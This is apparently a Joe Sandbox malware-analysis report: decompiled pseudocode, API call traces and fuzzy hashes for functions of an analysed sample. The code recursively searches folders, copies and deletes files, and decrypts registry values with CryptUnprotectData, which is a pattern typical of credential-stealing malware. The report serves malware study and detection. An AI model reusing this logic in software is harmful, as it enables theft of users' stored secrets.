0x0040b29f
0x0040b2ac
0x0040b2ac
0x0040b2bb
0x0040b2ce
0x0040b2d7
0x0040b2dd
0x0040b2df
0x0040b2ea
0x0040b2eb
0x0040b2f4
0x0040b2fa
0x0040b2ff
0x0040b307
0x0040b30f
0x0040b310
0x0040b318
0x0040b31b
0x0040b31b
0x0040b326
0x0040b333
0x0040b33b
0x0040b348
0x0040b34d
0x0040b35a
0x00000000

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 0040B1B6
RtlAllocateHeap.NTDLL(00000000), ref: 0040B1BD
wsprintfA.USER32 ref: 0040B1D5
FindFirstFileA.KERNEL32(?,?), ref: 0040B1EC
StrCmpCA.SHLWAPI(?,0040FBF0), ref: 0040B209
StrCmpCA.SHLWAPI(?,0040FBF4), ref: 0040B21F
wsprintfA.USER32 ref: 0040B23F
CopyFileA.KERNEL32(?,?,00000001), ref: 0040B258

Part of subcall function 0040AF7A: memset.MSVCRT ref: 0040AF9C
Part of subcall function 0040AF7A: memset.MSVCRT ref: 0040AFAA
Part of subcall function 0040AF7A: lstrcat.KERNEL32(?,00000000), ref: 0040AFC9
Part of subcall function 0040AF7A: lstrcat.KERNEL32(?), ref: 0040AFE4
Part of subcall function 0040AF7A: lstrcat.KERNEL32(?,?), ref: 0040AFF8
Part of subcall function 0040AF7A: lstrcat.KERNEL32(?), ref: 0040B00B
Part of subcall function 0040AF7A: StrStrA.SHLWAPI(00000000), ref: 0040B089

DeleteFileA.KERNEL32(?), ref: 0040B276
FindNextFileA.KERNEL32(00000000,?), ref: 0040B284
FindClose.KERNEL32(00000000), ref: 0040B293
lstrcat.KERNEL32(?), ref: 0040B2BB
lstrcat.KERNEL32(?), ref: 0040B2CE
lstrlen.KERNEL32(0040B496), ref: 0040B2D7
lstrlen.KERNEL32(0040B496), ref: 0040B2E4

Strings

%s\*, xrefs: 0040B1CF
%s\%s, xrefs: 0040B239

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateCloseCopyDeleteFirstNextProcess
String ID: %s\%s$%s\*
API String ID: 1244429688-2848263008
Opcode ID: 95184b8e813cf00bc2dc2dfd8616ec3613f6a420423bc77754867fd091aee847
Instruction ID: 49cbbe691c8f6be4800ff9f371ebe21ce5d5a247fd61f8c70fd932ec3804f9b4
Opcode Fuzzy Hash: 95184b8e813cf00bc2dc2dfd8616ec3613f6a420423bc77754867fd091aee847
Instruction Fuzzy Hash: 314121B190021DBBCF10EBA4DC49ADDBBBDEB08304F0495A6F605E32A0DB3597558F54

Uniqueness

Uniqueness Score: -1.00%

Function 0040B967 Relevance: 27.1, APIs: 18, Instructions: 137
stringmemoryregistryCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E0040B967(intOrPtr _a4, void** _a8) {
				int _v8;
				int _v12;
				int _v16;
				int* _v20;
				void* _v24;
				short* _v28;
				int _v32;
				char* _v36;
				char _v40;
				char _v1063;
				char _v1064;
				char _v2088;
				char _v3112;
				long _t52;
				long _t63;
				void* _t91;
				void* _t95;

				_v20 = 0;
				_v12 = 0xff;
				_v8 = 3;
				_v2088 = 0;
				_t52 = RegEnumValueA( *_a8, 0,  &_v2088,  &_v12, 0,  &_v8,  &_v1064,  &_v16);
				if(_t52 != 0) {
					return _t52;
				}
				do {
					 *0x61375c(_a4,  &_v2088);
					 *0x61375c(_a4, ": ");
					if(_v8 == 3) {
						if(StrStrA( &_v2088,  *0x6134b4) == 0) {
							wsprintfA( &_v1064, "%S",  &_v1064);
							_t95 = _t95 + 0xc;
							 *0x61375c(_a4,  &_v1064);
						} else {
							_v24 = RtlAllocateHeap(GetProcessHeap(), 8, 0x400);
							_v36 =  &_v1063;
							_push( &_v32);
							_push(1);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push( &_v40);
							_v40 = _v16 - 1;
							if( *0x61368c() == 0) {
								_t91 = 0x40fbe1;
							} else {
								_t91 = _v24;
								WideCharToMultiByte(0, 0, _v28, _v32, _t91, 0x400, 0, 0);
								LocalFree(_v28);
							}
							 *0x6137e8( &_v3112, _t91);
							HeapFree(GetProcessHeap(), 0, _t91);
							 *0x61375c(_a4,  &_v3112);
							 *0x6137e8( &_v3112, 0x40fbe1);
						}
					}
					 *0x61375c(_a4, "\n");
					_v20 =  &(_v20[0]);
					_v12 = 0x400;
					_v16 = 0x400;
					_t63 = RegEnumValueA( *_a8, _v20,  &_v2088,  &_v12, 0,  &_v8,  &_v1064,  &_v16);
				} while (_t63 == 0);
				return _t63;
			}

0x0040b994
0x0040b997
0x0040b99e
0x0040b9a5
0x0040b9ab
0x0040b9b3
0x0040bb16
0x0040bb16
0x0040b9c0
0x0040b9ca
0x0040b9d8
0x0040b9e2
0x0040b9fd
0x0040bab1
0x0040bab7
0x0040bac4
0x0040ba03
0x0040ba16
0x0040ba1f
0x0040ba25
0x0040ba26
0x0040ba28
0x0040ba29
0x0040ba2a
0x0040ba2b
0x0040ba30
0x0040ba31
0x0040ba3c
0x0040ba5e
0x0040ba3e
0x0040ba3e
0x0040ba4d
0x0040ba56
0x0040ba56
0x0040ba6b
0x0040ba7a
0x0040ba8a
0x0040ba9c
0x0040ba9c
0x0040b9fd
0x0040bad2
0x0040bad8
0x0040bafe
0x0040bb01
0x0040bb04
0x0040bb0a
0x00000000

APIs

RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,0040CC5C,?,?,00000000), ref: 0040B9AB
lstrcat.KERNEL32(000000FF,?), ref: 0040B9CA
lstrcat.KERNEL32(000000FF,0041217C), ref: 0040B9D8
StrStrA.SHLWAPI(?), ref: 0040B9F5
GetProcessHeap.KERNEL32(00000008,00000400), ref: 0040BA09
RtlAllocateHeap.NTDLL(00000000), ref: 0040BA10
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040BA34
WideCharToMultiByte.KERNEL32(00000000,00000000,0040CC5C,?,?,00000400,00000000,00000000), ref: 0040BA4D
LocalFree.KERNEL32(0040CC5C), ref: 0040BA56
lstrcpy.KERNEL32(?,0040FBE1), ref: 0040BA6B
GetProcessHeap.KERNEL32(00000000,0040FBE1), ref: 0040BA73
HeapFree.KERNEL32(00000000), ref: 0040BA7A
lstrcat.KERNEL32(000000FF,?), ref: 0040BA8A
lstrcpy.KERNEL32(?,0040FBE1), ref: 0040BA9C
wsprintfA.USER32 ref: 0040BAB1
lstrcat.KERNEL32(000000FF,?), ref: 0040BAC4
lstrcat.KERNEL32(000000FF,00412120), ref: 0040BAD2
RegEnumValueA.ADVAPI32(?,00000000,?,000000FF,00000000,00000003,?,?), ref: 0040BB04

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeProcessValuelstrcpy$AllocateByteCharCryptDataLocalMultiUnprotectWidewsprintf
String ID:
API String ID: 4067757933-0
Opcode ID: 342c63153ef778ef3c3929e488f0091da7081bee34f452ffb2006666ed202863
Instruction ID: 6759acc75c478484f19c09f5a666253d6b11a5c49cdf73f21243f1d3b5fcb5b8
Opcode Fuzzy Hash: 342c63153ef778ef3c3929e488f0091da7081bee34f452ffb2006666ed202863
Instruction Fuzzy Hash: FB51A7B2900119BFDF119F94DD48EEE7BBDEB48301F149062F606E2250D7359B459FA8

Uniqueness

Uniqueness Score: -1.00%

Function 004078B3 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 286
fileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004078B3(void* __ecx, void* __eflags, char _a4, char _a16, char _a28, char _a40, intOrPtr _a52, char _a56) {
				char _v20;
				CHAR* _v32;
				void* _v36;
				CHAR* _v48;
				char _v52;
				char _v56;
				CHAR* _v68;
				char _v80;
				char _v92;
				char _v104;
				char _v116;
				char _v128;
				char _v140;
				char _v152;
				char _v164;
				char _v176;
				char _v188;
				char _v200;
				char _v212;
				char _v224;
				char _v236;
				char _v248;
				char _v260;
				char _v272;
				char _v284;
				char _v296;
				char _v308;
				char _v320;
				char _v332;
				struct _WIN32_FIND_DATAA _v656;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t134;
				void* _t152;
				intOrPtr _t207;
				intOrPtr _t216;
				void* _t235;
				void* _t245;
				void* _t260;
				void* _t281;
				void* _t282;
				void* _t340;
				void* _t341;
				void* _t342;
				void* _t343;

				_t281 = __ecx;
				_t282 = 0x40fbe1;
				E0040EA50( &_v68, __eflags, 0x40fbe1);
				E0040EAEF(E0040EB6B( &_a4, _t281,  &_v32, __eflags, "\*.*"), _t281,  &_v68);
				E004016EF(_v32);
				_t134 = FindFirstFileA(_v68,  &_v656);
				_v36 = _t134;
				if(_t134 != 0xffffffff) {
					do {
						_push(0x40fbf0);
						_push( &(_v656.cFileName));
						if( *0x613784() != 0) {
							_t152 =  *0x613784( &(_v656.cFileName), 0x40fbf4);
							_t347 = _t152;
							if(_t152 != 0) {
								E0040EA50( &_v32, _t347, _t282);
								E0040EA50( &_v20, _t347, _t282);
								E0040EAEF(E0040EB29( &_v32, _t281,  &_a4,  &_v260, _t347), _t281,  &_v32);
								E004016EF(_v260);
								E0040EAEF(E0040EB6B( &_v32, _t281,  &_v284, _t347, 0x40fbe4), _t281,  &_v32);
								E004016EF(_v284);
								E0040EAEF(E0040EB6B( &_v32, _t281,  &_v116, _t347,  &(_v656.cFileName)), _t281,  &_v32);
								E004016EF(_v116);
								E0040EAEF(E0040EB6B( &_v20, _t281,  &_v236, _t347,  *0x613434), _t281,  &_v20);
								E004016EF(_v236);
								E0040EAEF(E0040EB6B( &_v20, _t281,  &_v140, _t347, 0x40fbe4), _t281,  &_v20);
								E004016EF(_v140);
								E0040EAEF(E0040EB29( &_v20, _t281,  &_a16,  &_v332, _t347), _t281,  &_v20);
								E004016EF(_v332);
								E0040EAEF(E0040EB6B( &_v20, _t281,  &_v164, _t347, 0x40fbe4), _t281,  &_v20);
								E004016EF(_v164);
								E0040EAEF(E0040EB29( &_v20, _t281,  &_a28,  &_v80, _t347), _t281,  &_v20);
								E004016EF(_v80);
								E0040EAEF(E0040EB6B( &_v20, _t281,  &_v188, _t347, 0x40fbe4), _t281,  &_v20);
								E004016EF(_v188);
								E0040EAEF(E0040EB29( &_v20, _t281,  &_a40,  &_v308, _t347), _t281,  &_v20);
								E004016EF(_v308);
								_t207 = _a52;
								if(_t207 == 0) {
									E0040EAEF(E0040EB6B( &_v20, _t281,  &_v152, __eflags, 0x40fbe4), _t281,  &_v20);
									E004016EF(_v152);
									E0040EAEF(E0040EB6B( &_v20, _t281,  &_v176, __eflags,  *0x61341c), _t281,  &_v20);
									_t216 = _v176;
									goto L9;
								} else {
									_t260 = _t207 - 1;
									if(_t260 == 0) {
										E0040EAEF(E0040EB6B( &_v20, _t281,  &_v104, __eflags, 0x40fbe4), _t281,  &_v20);
										E004016EF(_v104);
										E0040EAEF(E0040EB6B( &_v20, _t281,  &_v128, __eflags,  *0x613324), _t281,  &_v20);
										_t216 = _v128;
										goto L9;
									} else {
										_t350 = _t260 == 1;
										if(_t260 == 1) {
											E0040EAEF(E0040EB6B( &_v20, _t281,  &_v212, _t350, 0x40fbe4), _t281,  &_v20);
											E004016EF(_v212);
											E0040EAEF(E0040EB6B( &_v20, _t281,  &_v92, _t350,  *0x613100), _t281,  &_v20);
											_t216 = _v92;
											L9:
											E004016EF(_t216);
										}
									}
								}
								E0040EAEF(E0040EB6B( &_v20, _t281,  &_v200, _t350, 0x40fbe4), _t281,  &_v20);
								E004016EF(_v200);
								E0040EAEF(E0040EB6B( &_v20, _t281,  &_v224, _t350,  &(_v656.cFileName)), _t281,  &_v20);
								E004016EF(_v224);
								E0040EA50( &_v48, _t350, 0x40fbe1);
								E0040EAEF(E0040EB6B( &_v48, _t281,  &_v248, _t350,  *0x6133e4), _t281,  &_v48);
								E004016EF(_v248);
								_t235 = E0040D800(0x40fbe4,  &_v296, _t350, 8);
								_pop(_t281);
								E0040EAEF(E0040EB29( &_v48, _t281, _t235,  &_v272, _t350), _t281,  &_v48);
								E004016EF(_v272);
								E004016EF(_v296);
								CopyFileA(_v32, _v48, 1);
								_t341 = _t340 - 0xc;
								E0040EA50(_t341, _t350, _v48);
								_t245 = E00404B20( &_v52,  &_v56);
								_t340 = _t341 + 0xc;
								_t351 = _t245;
								if(_t245 != 0) {
									_push(_v56);
									_push(_v52);
									_t342 = _t340 - 0xc;
									E0040EA82( &_v20, _t281, _t342, _t351);
									_t343 = _t342 - 0x50;
									E00401581( &_a56, _t343);
									_push( &_v320);
									E00403721(_t281, _t351);
									_t340 = _t343 + 0x68;
									E004016EF(_v320);
								}
								DeleteFileA(_v48);
								E004016EF(_v48);
								E004016EF(_v20);
								E004016EF(_v32);
								_t282 = 0x40fbe1;
							}
						}
					} while (FindNextFileA(_v36,  &_v656) != 0);
					FindClose(_v36);
				}
				E004016EF(_v68);
				E004016EF(_a4);
				E004016EF(_a16);
				E004016EF(_a28);
				E004016EF(_a40);
				return E00401562( &_a56);
			}

0x004078b3
0x004078bf
0x004078c8
0x004078e0
0x004078e8
0x004078f7
0x004078fd
0x00407903
0x00407909
0x00407909
0x00407914
0x0040791d
0x0040792f
0x00407935
0x00407937
0x00407941
0x0040794a
0x00407963
0x0040796e
0x0040798a
0x00407995
0x004079af
0x004079b7
0x004079d3
0x004079de
0x004079f5
0x00407a00
0x00407a19
0x00407a24
0x00407a3b
0x00407a46
0x00407a5c
0x00407a64
0x00407a7b
0x00407a86
0x00407a9f
0x00407aaa
0x00407ab2
0x00407ab5
0x00407b51
0x00407b5c
0x00407b78
0x00407b7d
0x00000000
0x00407abb
0x00407abb
0x00407abc
0x00407b14
0x00407b1c
0x00407b35
0x00407b3a
0x00000000
0x00407abe
0x00407abe
0x00407abf
0x00407ad7
0x00407ae2
0x00407afb
0x00407b00
0x00407b83
0x00407b83
0x00407b83
0x00407abf
0x00407abc
0x00407b9a
0x00407ba5
0x00407bc2
0x00407bcd
0x00407bda
0x00407bf6
0x00407c01
0x00407c0e
0x00407c15
0x00407c27
0x00407c32
0x00407c3d
0x00407c4a
0x00407c50
0x00407c58
0x00407c63
0x00407c68
0x00407c6b
0x00407c6d
0x00407c6f
0x00407c75
0x00407c78
0x00407c7d
0x00407c82
0x00407c8a
0x00407c95
0x00407c96
0x00407ca1
0x00407ca4
0x00407ca4
0x00407cac
0x00407cb5
0x00407cbd
0x00407cc5
0x00407cca
0x00407cca
0x00407937
0x00407cdf
0x00407cea
0x00407cea
0x00407cf3
0x00407cfb
0x00407d03
0x00407d0b
0x00407d13
0x00407d24

APIs

Part of subcall function 0040EA50: lstrcpy.KERNEL32(00000000,00000000), ref: 0040EA76

Part of subcall function 0040EB6B: lstrlen.KERNEL32(?,?,?,0040D07A,00412124,00000000,00412124,00000000,0040FBE1), ref: 0040EB7F
Part of subcall function 0040EB6B: lstrcpy.KERNEL32(00000000,?), ref: 0040EBA7
Part of subcall function 0040EB6B: lstrcat.KERNEL32(?,00000000), ref: 0040EBB2

Part of subcall function 0040EAEF: lstrcpy.KERNEL32(00000000,?), ref: 0040EB1F

FindFirstFileA.KERNEL32(?,?,\*.*,0040FBE1,?,?,?), ref: 004078F7
StrCmpCA.SHLWAPI(?,0040FBF0,?,?,?), ref: 00407915
StrCmpCA.SHLWAPI(?,0040FBF4,?,?,?), ref: 0040792F

Part of subcall function 0040EB29: lstrcpy.KERNEL32(00000000,?), ref: 0040EB57
Part of subcall function 0040EB29: lstrcat.KERNEL32(?,00000000), ref: 0040EB61

CopyFileA.KERNEL32(?,?,00000001), ref: 00407C4A
DeleteFileA.KERNEL32(?), ref: 00407CAC
FindNextFileA.KERNEL32(?,?,?,?,?), ref: 00407CD9
FindClose.KERNEL32(?,?,?,?), ref: 00407CEA

Strings

\*.*, xrefs: 004078CD

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 58a886fa26b326d01da60649739e54e112c1f0c29e2d8827d235a7e894efbb50
Instruction ID: ed0b5820a0968596e91cbaa2620dfb19de2fb79743b32bbfcd6ef60983e4778e
Opcode Fuzzy Hash: 58a886fa26b326d01da60649739e54e112c1f0c29e2d8827d235a7e894efbb50
Instruction Fuzzy Hash: 22C1B831E1002A9BCF10FBA6DC819DEB3B5BF04308F4549B6B515B71A1DA387E5A8F58

Uniqueness

Uniqueness Score: -1.00%

Function 004075DC Relevance: 13.7, APIs: 9, Instructions: 202
fileCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004075DC(void* __ecx, void* __eflags, char _a4, char _a16, char _a28, char _a40) {
				char _v20;
				void* _v24;
				CHAR* _v36;
				char _v48;
				char _v60;
				char _v72;
				struct _WIN32_FIND_DATAA _v392;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t70;
				void* _t86;
				void* _t101;
				void* _t150;
				void* _t182;
				void* _t183;
				void* _t184;
				void* _t185;
				void* _t186;
				void* _t187;
				void* _t188;
				void* _t189;
				void* _t190;
				void* _t191;
				void* _t192;
				void* _t193;
				void* _t194;
				void* _t195;
				void* _t196;
				void* _t197;
				void* _t198;
				void* _t199;

				_t150 = __ecx;
				E0040EA50( &_v36, __eflags, 0x40fbe1);
				E0040EAEF(E0040EB6B(E0040EB29( &_v36, _t150,  &_a16,  &_v48, __eflags), _t150,  &_v20, __eflags, "\\*"), _t150,  &_v36);
				E004016EF(_v20);
				E004016EF(_v48);
				_t70 = FindFirstFileA(_v36,  &_v392);
				_v24 = _t70;
				if(_t70 != 0xffffffff) {
					do {
						_push(0x40fbf0);
						_push( &(_v392.cFileName));
						if( *0x613784() != 0) {
							_t86 =  *0x613784( &(_v392.cFileName), 0x40fbf4);
							_t203 = _t86;
							if(_t86 != 0) {
								E0040EA50( &_v20, _t203, 0x40fbe1);
								E0040EAEF(E0040EB6B(E0040EB6B(E0040EB29( &_v20, _t150,  &_a16,  &_v60, _t203), _t150,  &_v72, _t203, 0x40fbe4), _t150,  &_v48, _t203,  &(_v392.cFileName)), _t150,  &_v20);
								E004016EF(_v48);
								E004016EF(_v72);
								E004016EF(_v60);
								_t101 =  *0x613784( &(_v392.cFileName),  *0x613370);
								_t204 = _t101;
								if(_t101 != 0) {
									__eflags =  *0x613784( &(_v392.cFileName),  *0x613010);
									if(__eflags != 0) {
										__eflags =  *0x613784( &(_v392.cFileName),  *0x613550);
										if(__eflags != 0) {
											__eflags =  *0x613784( &(_v392.cFileName),  *0x613090);
											if(__eflags == 0) {
												_t187 = _t182 - 0x50;
												_t149 =  &_a40;
												E00401581( &_a40, _t187);
												_t188 = _t187 - 0xc;
												E0040EA82( &_a28, _t150, _t188, __eflags);
												_t189 = _t188 - 0xc;
												E0040EA82( &_a4, _t150, _t189, __eflags);
												_t190 = _t189 - 0xc;
												E0040EA82( &_v20, _t150, _t190, __eflags);
												E00407371(_t150, __eflags);
												goto L11;
											}
										} else {
											_t191 = _t182 - 0xc;
											E0040EA82( &_a16, _t150, _t191, __eflags);
											_t192 = _t191 - 0xc;
											E0040EA82( &_a28, _t150, _t192, __eflags);
											_t193 = _t192 - 0xc;
											E0040EA82( &_a4, _t150, _t193, __eflags);
											E0040687D(_t149,  &_a16, _t193);
											_t182 = _t193 + 0x24;
										}
									} else {
										_t194 = _t182 - 0x50;
										_t149 =  &_a40;
										E00401581( &_a40, _t194);
										_t195 = _t194 - 0xc;
										E0040EA82( &_a28, _t150, _t195, __eflags);
										_t196 = _t195 - 0xc;
										E0040EA82( &_a4, _t150, _t196, __eflags);
										_t190 = _t196 - 0xc;
										E0040EA82( &_v20, _t150, _t190, __eflags);
										E004070A2(_t150, __eflags);
										goto L11;
									}
								} else {
									_t197 = _t182 - 0x50;
									_t149 =  &_a40;
									E00401581( &_a40, _t197);
									_t198 = _t197 - 0xc;
									E0040EA82( &_a28, _t150, _t198, _t204);
									_t199 = _t198 - 0xc;
									E0040EA82( &_a4, _t150, _t199, _t204);
									_t190 = _t199 - 0xc;
									E0040EA82( &_v20, _t150, _t190, _t204);
									E00406C80(_t150, _t204);
									L11:
									_t182 = _t190 + 0x74;
								}
								_t205 = _v392.dwFileAttributes & 0x00000010;
								if((_v392.dwFileAttributes & 0x00000010) != 0) {
									_t183 = _t182 - 0x50;
									_t149 =  &_a40;
									E00401581( &_a40, _t183);
									_t184 = _t183 - 0xc;
									E0040EA82( &_a28, _t150, _t184, _t205);
									_t185 = _t184 - 0xc;
									E0040EA82( &_v20, _t150, _t185, _t205);
									_t186 = _t185 - 0xc;
									E0040EA50(_t186, _t205,  &(_v392.cFileName));
									E004075DC(_t150, _t205);
									_t182 = _t186 + 0x74;
								}
								E004016EF(_v20);
							}
						}
					} while (FindNextFileA(_v24,  &_v392) != 0);
					FindClose(_v24);
				}
				E004016EF(_v36);
				E004016EF(_a4);
				E004016EF(_a16);
				E004016EF(_a28);
				return E00401562( &_a40);
			}

0x004075dc
0x004075f0
0x00407613
0x0040761b
0x00407623
0x00407632
0x00407638
0x0040763e
0x00407644
0x00407644
0x0040764f
0x00407658
0x0040766a
0x00407670
0x00407672
0x00407680
0x004076b2
0x004076ba
0x004076c2
0x004076ca
0x004076dc
0x004076e2
0x004076e4
0x00407737
0x00407739
0x0040778c
0x0040778e
0x004077d4
0x004077d6
0x004077d8
0x004077db
0x004077e0
0x004077e5
0x004077ed
0x004077f2
0x004077fa
0x004077ff
0x00407807
0x0040780c
0x00000000
0x0040780c
0x00407790
0x00407790
0x00407798
0x0040779d
0x004077a5
0x004077aa
0x004077b2
0x004077b7
0x004077bc
0x004077bc
0x0040773b
0x0040773b
0x0040773e
0x00407743
0x00407748
0x00407750
0x00407755
0x0040775d
0x00407762
0x0040776a
0x0040776f
0x00000000
0x0040776f
0x004076e6
0x004076e6
0x004076e9
0x004076ee
0x004076f3
0x004076fb
0x00407700
0x00407708
0x0040770d
0x00407715
0x0040771a
0x00407811
0x00407811
0x00407811
0x00407814
0x0040781b
0x0040781d
0x00407820
0x00407825
0x0040782a
0x00407832
0x00407837
0x0040783f
0x00407844
0x00407850
0x00407855
0x0040785a
0x0040785a
0x00407860
0x00407860
0x00407672
0x00407875
0x00407880
0x00407880
0x00407889
0x00407891
0x00407899
0x004078a1
0x004078b2

APIs

Part of subcall function 0040EA50: lstrcpy.KERNEL32(00000000,00000000), ref: 0040EA76

Part of subcall function 0040EB29: lstrcpy.KERNEL32(00000000,?), ref: 0040EB57
Part of subcall function 0040EB29: lstrcat.KERNEL32(?,00000000), ref: 0040EB61

Part of subcall function 0040EB6B: lstrlen.KERNEL32(?,?,?,0040D07A,00412124,00000000,00412124,00000000,0040FBE1), ref: 0040EB7F
Part of subcall function 0040EB6B: lstrcpy.KERNEL32(00000000,?), ref: 0040EBA7
Part of subcall function 0040EB6B: lstrcat.KERNEL32(?,00000000), ref: 0040EBB2

Part of subcall function 0040EAEF: lstrcpy.KERNEL32(00000000,?), ref: 0040EB1F

FindFirstFileA.KERNEL32(?,?,00412134,0040FBE1,?,?,?), ref: 00407632
StrCmpCA.SHLWAPI(?,0040FBF0,?,?,?), ref: 00407650
StrCmpCA.SHLWAPI(?,0040FBF4,?,?,?), ref: 0040766A
StrCmpCA.SHLWAPI(?,0040FBE4,?,0040FBE1,?,?,?), ref: 004076DC
StrCmpCA.SHLWAPI(?,?,?,?), ref: 00407731

Part of subcall function 0040EA82: lstrcpy.KERNEL32(00000000,?), ref: 0040EAA1

Part of subcall function 00406C80: CopyFileA.KERNEL32(?,?,00000001), ref: 00406CF0

FindNextFileA.KERNEL32(?,?,?,?,?), ref: 0040786F
FindClose.KERNEL32(?,?,?,?), ref: 00407880

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
String ID:
API String ID: 3801961486-0
Opcode ID: be12a1cd1c7d59719f1417be8a83aed2d30420a42bfdf3daf0fcf08353907521
Instruction ID: 75a1029da3be909d596b01280236933554a0e18b75c63000283471e825cc84e8
Opcode Fuzzy Hash: be12a1cd1c7d59719f1417be8a83aed2d30420a42bfdf3daf0fcf08353907521
Instruction Fuzzy Hash: E0715172D001199BCB10FB76DD46ADD7779BF04308F444576FC05B32A1EA38AB198AD9

Uniqueness

Uniqueness Score: -1.00%

Function 00406790 Relevance: 9.1, APIs: 6, Instructions: 81stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004067B7
lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 004067D2
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 004067DC
memcpy.MSVCRT ref: 00406840
lstrcat.KERNEL32(0040FBE1,0040FBE1), ref: 0040685D
lstrcat.KERNEL32(0040FBE1,0040FBE1), ref: 00406871

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
String ID:
API String ID: 1498829745-0
Opcode ID: bb2e025ba45f61a511a66cf5d748651bbc590cd9fcd16a75c9e4b3fbff3876a2
Instruction ID: dc856fb95d08b6f9d4ff6c5489e754ca28570d9b12ea1677ce96c91b2322e655
Opcode Fuzzy Hash: bb2e025ba45f61a511a66cf5d748651bbc590cd9fcd16a75c9e4b3fbff3876a2
